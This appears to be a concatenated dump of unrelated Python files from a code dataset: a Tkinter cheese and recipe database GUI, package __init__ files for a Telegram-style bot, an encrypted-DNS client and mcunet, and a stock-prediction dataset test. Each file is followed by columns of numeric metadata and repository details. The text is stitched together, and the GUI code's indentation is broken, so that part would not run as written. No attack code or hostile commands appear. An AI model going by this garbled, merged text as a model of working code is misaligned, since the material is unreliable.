        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 0)
        self.rowconfigure(1, pad = 3, weight = 1)
        clabel = tk.Label(self, text = "Recipe name:",
            font = ("Arial", 16), bg = "white")
        clabel.grid(row = 0, column = 0)
        # area1 = recipe name (read back by db_del_recipe).
        self.area1 = tk.Text(self)
        self.area1.grid(row = 1, column = 0, columnspan = 1,
            rowspan = 1)
        # NOTE(review): buttons land in rows 8/9 while only rows 0/1 are
        # configured — presumably copied from add_recipe; Tk tolerates it
        # but the rows get no weight/padding. Confirm intended layout.
        delb = ttk.Button(self, text = "Delete", style = "Slate.TButton")
        delb.grid(row = 8, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back", style = "Slate.TButton")
        back.grid(row = 9, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back.bind("<1>", self.delete_menu)
        delb.bind("<1>", self.db_del_recipe)
        self.pack()
def db_del_recipe(self, event):
"""
Handles the deletion of the recipe from the actual databaes
:return: returns nothing
"""
recipe_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
recipe_to_add = None
if (recipe_name == "" or
db_func.row_exists(self.db, recipe_name, "recipes") is False):
self.clean()
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text =
"Error: Recipe not found",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
else:
self.clean()
cursor = self.db.cursor()
cursor.execute("select rowid from recipes where name = ?",
(str(recipe_name),))
reid = cursor.fetchone()[0]
recipe_to_del = table_objects.recipe(reid,
recipe_name, "notimportant", "notimportant")
db_func.del_recipe_row(self.db, recipe_to_del)
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
    def search_menu(self, event):
        """
        Search menu: the user decides what to search for (cheese by
        softness, cheese by country, or recipe by cheese).

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Four equally-weighted rows, one button each.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 1)
        self.rowconfigure(3, pad = 3, weight = 1)
        softness = ttk.Button(self, text = "Search cheese by softness",
            style = "Slate.TButton")
        softness.grid(row = 0, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        country = ttk.Button(self, text = "Search cheese by country",
            style = "Slate.TButton")
        country.grid(row = 1, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        recipe = ttk.Button(self, text = "Search recipe by cheese",
            style = "Slate.TButton")
        recipe.grid(row = 2, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back",
            style = "Slate.TButton")
        back.grid(row = 3, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        softness.bind("<1>", self.search_softness)
        country.bind("<1>", self.search_country)
        recipe.bind("<1>", self.search_recipe)
        back.bind("<1>", self.main_menu)
        self.pack()
def search_softness(self, event):
    """
    Show softnesses in database
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    for row in (0, 1, 2):
        self.rowconfigure(row, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    # distinct softness values, sorted for display
    rows = self.db.cursor().execute(
        "select softness from cheeses").fetchall()
    for entry in sorted(set(rows)):
        self.listbox.insert(tk.END, str(entry[0]))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    for row, (caption, handler) in enumerate(
            (("Search", self.show_search_softness),
             ("Back", self.search_menu)), start = 1):
        button = ttk.Button(self, text = caption, style = "Slate.TButton")
        button.grid(row = row, column = 0,
                    sticky = tk.N + tk.S + tk.E + tk.W)
        button.bind("<1>", handler)
    self.pack()
def show_search_softness(self, event):
    """
    Show cheeses with selected softness
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    # grab the selection before clean() rebuilds the widgets
    chosen = self.listbox.get(tk.ACTIVE)
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    self.rowconfigure(0, pad = 3, weight = 1)
    self.rowconfigure(1, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    rows = self.db.cursor().execute(
        "select name from cheeses where softness = ?",
        (str(chosen),)).fetchall()
    for match in sorted(set(rows)):
        self.listbox.insert(tk.END, str(match[0]))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    back = ttk.Button(self, text = "Back", style = "Slate.TButton")
    back.grid(row = 1, column = 0,
              sticky = tk.N + tk.S + tk.E + tk.W)
    back.bind("<1>", self.search_menu)
    self.pack()
def search_country(self, event):
    """
    Show countries in database
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    for row in (0, 1, 2):
        self.rowconfigure(row, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    rows = self.db.cursor().execute(
        "select name from countries").fetchall()
    for entry in sorted(set(rows)):
        self.listbox.insert(tk.END, str(entry[0]))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    for row, (caption, handler) in enumerate(
            (("Search", self.show_search_country),
             ("Back", self.search_menu)), start = 1):
        button = ttk.Button(self, text = caption, style = "Slate.TButton")
        button.grid(row = row, column = 0,
                    sticky = tk.N + tk.S + tk.E + tk.W)
        button.bind("<1>", handler)
    self.pack()
def show_search_country(self, event):
    """
    Show cheeses associated to selected country
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    # grab the selection before clean() rebuilds the widgets
    chosen = self.listbox.get(tk.ACTIVE)
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    self.rowconfigure(0, pad = 3, weight = 1)
    self.rowconfigure(1, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    cursor = self.db.cursor()
    # country name -> rowid -> linked cheese ids -> cheese names
    cursor.execute("select rowid from countries where name = ?",
                   (str(chosen),))
    coid = cursor.fetchone()[0]
    cursor.execute("select chid from cheese_country where coid = ?",
                   (str(coid),))
    names = []
    for link in cursor.fetchall():
        cursor.execute("select name from cheeses where rowid = ?",
                       (str(link[0]),))
        names.append(cursor.fetchone()[0])
    for name in sorted(set(names)):
        self.listbox.insert(tk.END, str(name))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    back = ttk.Button(self, text = "Back", style = "Slate.TButton")
    back.grid(row = 1, column = 0,
              sticky = tk.N + tk.S + tk.E + tk.W)
    back.bind("<1>", self.search_menu)
    self.pack()
def search_recipe(self, event):
    """
    Show cheeses with recipes
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    for row in (0, 1, 2):
        self.rowconfigure(row, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    rows = self.db.cursor().execute(
        "select name from cheeses").fetchall()
    for entry in sorted(set(rows)):
        self.listbox.insert(tk.END, str(entry[0]))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    for row, (caption, handler) in enumerate(
            (("Search", self.show_search_recipe),
             ("Back", self.search_menu)), start = 1):
        button = ttk.Button(self, text = caption, style = "Slate.TButton")
        button.grid(row = row, column = 0,
                    sticky = tk.N + tk.S + tk.E + tk.W)
        button.bind("<1>", handler)
    self.pack()
def show_search_recipe(self, event):
    """
    Show associated recipes
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    # grab the selection before clean() rebuilds the widgets
    chosen = self.listbox.get(tk.ACTIVE)
    self.clean()
    ttk.Style().configure("Slate.TButton", padding = (0, 5, 0, 5),
                          font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.columnconfigure(1, pad = 3, weight = 0)
    for row in (0, 1, 2):
        self.rowconfigure(row, pad = 3, weight = 1)
    bar = tk.Scrollbar(self)
    self.listbox = tk.Listbox(self, yscrollcommand = bar.set)
    cursor = self.db.cursor()
    # cheese name -> rowid -> linked recipe ids -> recipe names
    cursor.execute("select rowid from cheeses where name = ?",
                   (str(chosen),))
    chid = cursor.fetchone()[0]
    cursor.execute("select reid from cheese_recipes where chid = ?",
                   (str(chid),))
    names = []
    for link in cursor.fetchall():
        cursor.execute("select name from recipes where rowid = ?",
                       (str(link[0]),))
        names.append(cursor.fetchone()[0])
    for name in sorted(set(names)):
        self.listbox.insert(tk.END, str(name))
    bar.config(command = self.listbox.yview)
    self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
    bar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
    for row, (caption, handler) in enumerate(
            (("Details", self.show_recipe_details),
             ("Back", self.search_recipe)), start = 1):
        button = ttk.Button(self, text = caption, style = "Slate.TButton")
        button.grid(row = row, column = 0,
                    sticky = tk.N + tk.S + tk.E + tk.W)
        button.bind("<1>", handler)
    self.pack()
def show_recipe_details(self, event):
    """
    Show selected recipe's name, time and instructions.

    Reads the current selection from self.listbox, so it must be reached
    from a screen whose listbox holds recipe names (show_search_recipe).
    :param event: tkinter click event (unused)
    :return: returns nothing
    """
    sel_recipe = self.listbox.get(tk.ACTIVE)
    self.clean()
    ttk.Style().configure("Slate.TButton", padding =
                          (0, 5, 0, 5), font = 'Arial 20',
                          foreground = "black", background = "white")
    self.columnconfigure(0, pad = 3, weight = 1)
    self.rowconfigure(0, pad = 3, weight = 1)
    self.rowconfigure(1, pad = 3, weight = 1)
    # instructions row gets most of the vertical space
    self.rowconfigure(2, pad = 3, weight = 4)
    self.rowconfigure(3, pad = 3, weight = 1)
    cursor = self.db.cursor()
    # Fetch both columns in a single query instead of two separate
    # lookups with identical WHERE clauses (was: one query for `time`,
    # a second for `instructions`).
    cursor.execute("select time, instructions from recipes where name = ?",
                   (str(sel_recipe),))
    time, instructions = cursor.fetchone()
    nlabel = tk.Label(self, text = sel_recipe,
                      font = ("Arial", 16), bg = "white",
                      anchor = tk.W, justify = tk.LEFT)
    nlabel.grid(row = 0, column = 0)
    tlabel = tk.Label(self, text = time,
                      font = ("Arial", 12), bg = "white",
                      anchor = tk.W, justify = tk.LEFT)
    tlabel.grid(row = 1, column = 0)
    ilabel = tk.Label(self, text = instructions,
                      font = ("Arial", 12), bg = "white",
                      anchor = tk.W, justify = tk.LEFT)
    # wrap long instruction text to the current window width
    ilabel.configure(wraplength = self.winfo_width() - 3)
    ilabel.grid(row = 2, column = 0)
    back = ttk.Button(self, text = "Back",
                      style = "Slate.TButton")
    back.grid(row = 3, column = 0,
              sticky = tk.N + tk.S + tk.E + tk.W)
    back.bind("<1>", self.search_recipe)
    self.pack()
| 28.291749
| 82
| 0.620187
| 4,208
| 28,801
| 4.195105
| 0.052519
| 0.026908
| 0.053249
| 0.046111
| 0.836685
| 0.793973
| 0.776299
| 0.749901
| 0.735003
| 0.724183
| 0
| 0.034008
| 0.208743
| 28,801
| 1,017
| 83
| 28.319567
| 0.74062
| 0.023923
| 0
| 0.713004
| 0
| 0
| 0.10269
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010463
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43963e954da0ba78130c8b33fa13b0a2ac4f6676
| 1,022
|
py
|
Python
|
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | 1
|
2022-01-01T07:19:42.000Z
|
2022-01-01T07:19:42.000Z
|
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | null | null | null |
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | null | null | null |
"""EduuRobot utilities."""
# SPDX-License-Identifier: MIT
# Copyright (c) 2018-2022 Amano Team
from typing import List
from .utils import (
EMOJI_PATTERN,
add_chat,
aiowrap,
button_parser,
chat_exists,
check_perms,
commands,
del_restarted,
get_emoji_regex,
get_format_keys,
get_reason_text,
get_restarted,
get_target_user,
http,
pretty_size,
remove_escapes,
require_admin,
run_async,
set_restarted,
shell_exec,
split_quotes,
sudofilter,
time_extract,
)
# Explicit public API of the eduu.utils package; mirrors the names
# imported from .utils above so wildcard imports stay in sync.
__all__: List[str] = [
"EMOJI_PATTERN",
"add_chat",
"aiowrap",
"button_parser",
"chat_exists",
"check_perms",
"commands",
"del_restarted",
"get_emoji_regex",
"get_format_keys",
"get_reason_text",
"get_restarted",
"get_target_user",
"http",
"pretty_size",
"remove_escapes",
"require_admin",
"run_async",
"set_restarted",
"shell_exec",
"split_quotes",
"sudofilter",
"time_extract",
]
| 17.62069
| 36
| 0.634051
| 114
| 1,022
| 5.245614
| 0.5
| 0.080268
| 0.050167
| 0.063545
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0
| 0.010471
| 0.252446
| 1,022
| 57
| 37
| 17.929825
| 0.772251
| 0.08317
| 0
| 0
| 0
| 0
| 0.284946
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43accad8e739fda15cb274b7494c679d52d86153
| 266
|
py
|
Python
|
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
from encrypted_dns.upstream.base_upstream import Upstream
from encrypted_dns.upstream.tls import TLSUpstream
from encrypted_dns.upstream.https import HTTPSUpstream
from encrypted_dns.upstream.udp import UDPUpstream
from encrypted_dns.upstream.tcp import TCPUpstream
| 44.333333
| 57
| 0.887218
| 36
| 266
| 6.388889
| 0.388889
| 0.282609
| 0.347826
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075188
| 266
| 5
| 58
| 53.2
| 0.934959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43c4d763334df4f6123eeae0bed61b543872388a
| 192
|
py
|
Python
|
mcunet/utils/__init__.py
|
1999michael/tinyml
|
e8a5c9baef3d8a4890bb7ddbed4f5655cb4fa535
|
[
"MIT"
] | 306
|
2021-01-15T07:49:40.000Z
|
2022-03-31T03:13:20.000Z
|
utils/__init__.py
|
liuyy3364/mcunet
|
f53f9e20e8e912bdb111b4c32da75e71e9a59597
|
[
"Apache-2.0"
] | 9
|
2021-02-04T00:58:33.000Z
|
2022-03-29T06:19:55.000Z
|
utils/__init__.py
|
liuyy3364/mcunet
|
f53f9e20e8e912bdb111b4c32da75e71e9a59597
|
[
"Apache-2.0"
] | 65
|
2021-01-18T06:06:09.000Z
|
2022-03-25T01:42:15.000Z
|
from .flops_counter import *
from .pytorch_utils import *
from .my_modules import *
from .common_tools import *
from .pytorch_modules import *
from .bn_utils import *
from .net_config import *
| 27.428571
| 30
| 0.786458
| 28
| 192
| 5.142857
| 0.464286
| 0.416667
| 0.236111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 192
| 7
| 31
| 27.428571
| 0.872727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
78ddd085041dc1388a3659c68f22ca143128a112
| 9,220
|
py
|
Python
|
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
#!/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import numpy as np
from Utils import Utils
from Dataset import Dataset
def dataset_test():
    """Smoke-test the Dataset class end to end, printing each intermediate state.

    Covers: building datasets (values, dates, per-date features), temporal
    conversion and reversion, neural-network array extraction and splitting,
    writing predictions back, and normalization.  Output is printed for
    manual inspection; there are no assertions.

    :return: returns nothing
    """
    stock_value=[1,2,3,4,5,6,7,8,9,10]
    # BUGFIX: last entry was a bare `100` instead of `[100]`; every feature
    # row must be a list to keep the one-list-per-date shape consistent.
    features_values=[[10],[20],[30],[40],[50],[60],[70],[80],[90],[100]]
    dates=Utils.getStrNextNWorkDays('17/06/2021',len(stock_value))
    # ------------------- values only
    print('-------------------')
    dataset=Dataset(name='OriginalGE')
    dataset.addCompany(stock_value)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Values:',dataset.getValues())
    print('Values Main:',dataset.getValues(only_main_value=True))
    # ------------------- values + dates
    print('-------------------')
    dataset=Dataset(name='OriginalGE')
    dataset.addCompany(stock_value,dates)
    print('Len:',dataset.getSize())
    dataset.print()
    # ------------------- values + dates + features
    print('-------------------')
    dataset=Dataset(name='OriginalGE')
    dataset.addCompany(stock_value,dates,features_values)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Values Main:',dataset.getValues(only_main_value=True))
    # ------------------- temporal conversion
    print('-------------------')
    dataset.convertToTemporalValues(3,2)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Values Main:',dataset.getValues(only_main_value=True))
    # ------------------- revert on a copy
    print('-------------------')
    dataset_reverted=dataset.copy()
    dataset_reverted.name+=' copy'
    dataset_reverted.revertFromTemporalValues()
    print('Len:',dataset_reverted.getSize())
    dataset_reverted.print()
    print('Indexes:',dataset_reverted.getIndexes())
    print('Values:',dataset_reverted.getValues())
    # ------------------- neural network arrays
    print('-------------------')
    print('Train data:')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays()
    print('Neural Network Start Index:',start_index)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    print()
    print('Full data:')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True)
    print('Neural Network Start Index:',start_index)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    print()
    print('To predict data:')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(only_test_data=True)
    print('Neural Network Start Index:',start_index)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    # ------------------- two companies
    print('-------------------')
    stock_value_2=[-el for el in stock_value]
    dataset=Dataset(name='OriginalGE and OriginalGE*-1')
    dataset.addCompany(stock_value,dates,features_values)
    dataset.addCompany(stock_value_2,dates,features_values)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Values Main:',dataset.getValues(only_main_value=True))
    print('Values Splitted by Feature:',dataset.getValuesSplittedByFeature())
    # ------------------- temporal conversion, two companies
    print('-------------------')
    dataset.convertToTemporalValues(3,2)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Values Main:',dataset.getValues(only_main_value=True))
    # ------------------- arrays + split, two companies
    print('-------------------')
    print('Full data:')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True)
    print('Neural Network Start Index:',start_index)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    print()
    print('To predict data:')
    start_index_to_pred,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(only_test_data=True)
    print('Neural Network Start Index:',start_index_to_pred)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    print()
    print('Train data:')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays()
    print('Neural Network Start Index:',start_index)
    print('Neural Network X Shape:',dataset_x.shape)
    print('Neural Network Y Shape:',dataset_y.shape)
    start_index_part_2,dataset_x_p1,dataset_x_p2=Dataset.splitNeuralNetworkArray(dataset_x,.7)
    print('Train Data Splitted Start Index:',start_index_part_2)
    print('Neural Network X Splitted P1 Shape:',dataset_x_p1.shape)
    # BUGFIX: label said "P1" on the line that prints the second partition.
    print('Neural Network X Splitted P2 Shape:',dataset_x_p2.shape)
    print()
    # ------------------- revert on a copy, two companies
    print('-------------------')
    dataset_reverted=dataset.copy()
    dataset_reverted.name+=' copy'
    dataset_reverted.revertFromTemporalValues()
    print('Len:',dataset_reverted.getSize())
    dataset_reverted.print()
    print('Indexes:',dataset_reverted.getIndexes())
    print('Values:',dataset_reverted.getValues())
    # ------------------- inject 3-D prediction results
    print('-------------------')
    correct_predictions=np.array([[[10, -10], [11, -11]],[[11, -11], [12, -12]]])
    print('Correct preds shape',correct_predictions.shape)
    dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Indexes degree 1:',dataset.getIndexes(degree=1))
    print('Values degree 1:',dataset.getValues(degree=1))
    print('Indexes degree 2:',dataset.getIndexes(degree=2))
    print('Values degree 2:',dataset.getValues(degree=2))
    # ------------------- inject 2-D prediction results
    print('-------------------')
    correct_predictions=np.array([[10, -10, 11, -11],[11, -11,12, -12]])
    print('Correct preds shape',correct_predictions.shape)
    dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
    print('Len:',dataset.getSize())
    dataset.print()
    print('Indexes:',dataset.getIndexes())
    print('Values:',dataset.getValues())
    print('Indexes degree 1:',dataset.getIndexes(degree=1))
    print('Values degree 1:',dataset.getValues(degree=1))
    print('Indexes degree 2:',dataset.getIndexes(degree=2))
    print('Values degree 2:',dataset.getValues(degree=2))
    # ------------------- revert with predictions attached
    print('-------------------')
    dataset_reverted=dataset.copy()
    dataset_reverted.name+=' copy'
    dataset_reverted.revertFromTemporalValues()
    print('Len:',dataset_reverted.getSize())
    dataset_reverted.print()
    print('Indexes:',dataset_reverted.getIndexes())
    print('Values:',dataset_reverted.getValues())
    print()
    indexes,preds=dataset_reverted.getDatesAndPredictions()
    print('Pred Indexes:',indexes)
    print('Pred Values:',preds)
    print('Indexes degree 1:',dataset.getIndexes(degree=1))
    print('Values degree 1:',dataset.getValues(degree=1))
    print('Indexes degree 2:',dataset.getIndexes(degree=2))
    print('Values degree 2:',dataset.getValues(degree=2))
    print('\t*Inner dimmension = companies | After inner dimmension = multiple predictions')
    # ------------------- normalization
    print('-------------------')
    dataset=Dataset(name='OriginalGE')
    dataset.addCompany(stock_value,dates,features_values)
    print('Values:',dataset.getValues())
    print('Max:',dataset.getAbsMaxes())
    # -------------------
    print('-------------------')
    dataset.convertToTemporalValues(3,2)
    print('Max:',dataset.getAbsMaxes())
    # -------------------
    print('-------------------')
    start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True,normalization=Dataset.Normalization.NORMALIZE)
    print('Neural Network X 0:',dataset_x[0].tolist())
    print('Neural Network Y 0:',dataset_y[0].tolist())
    # ------------------- inject normalized predictions
    print('-------------------')
    correct_predictions=np.array([[[1, -1], [1.1, -1.1]],[[1.1, -1.1], [1.2, -1.2]]])
    print('Correct preds shape',correct_predictions.shape)
    dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
    print('Len:',dataset.getSize())
    dataset.print()
    # ------------------- features split without features
    print('-------------------')
    dataset=Dataset(name='OriginalGE and OriginalGE*-1')
    dataset.addCompany(stock_value,dates)
    dataset.addCompany(stock_value_2,dates)
    print('Values Main:',dataset.getValues(only_main_value=True))
    print('Values Splitted by Feature:',dataset.getValuesSplittedByFeature())
    # ------------------- multi-step predictions reshaped per company
    print('-------------------')
    dataset=Dataset(name='OriginalGE')
    dataset.addCompany(stock_value,dates)
    dataset.convertToTemporalValues(4,3)
    dataset.print()
    correct_predictions=np.array([[[9.1], [10.1], [11.1]],[[10.2], [11.2], [12.2]],[[11.3], [12.3], [13.3]]])
    dataset.setNeuralNetworkResultArray(start_index_to_pred-1,correct_predictions)
    dataset.print()
    dataset.revertFromTemporalValues()
    dataset.print()
    indexes,preds=dataset.getDatesAndPredictions()
    print('Pred Indexes:',indexes)
    print('Pred Values:',preds)
    # regroup predictions as [company][forecast-step][sample]
    tmp_pred_values=[[[] for _ in range(3)] for _ in range(1)]
    for i,day_samples in enumerate(preds):
        for j,a_prediction in enumerate(day_samples):
            for k,company in enumerate(a_prediction):
                print(i,j,k,'-',company)
                tmp_pred_values[k][j].append(company)
    preds=tmp_pred_values
    print('Pred Values:',preds)


dataset_test()
| 40.977778
| 134
| 0.675163
| 1,089
| 9,220
| 5.567493
| 0.111111
| 0.042883
| 0.065314
| 0.040079
| 0.83655
| 0.814448
| 0.788059
| 0.780142
| 0.780142
| 0.73495
| 0
| 0.02006
| 0.097072
| 9,220
| 224
| 135
| 41.160714
| 0.708228
| 0.045011
| 0
| 0.788945
| 0
| 0
| 0.218692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005025
| false
| 0
| 0.030151
| 0
| 0.035176
| 0.668342
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
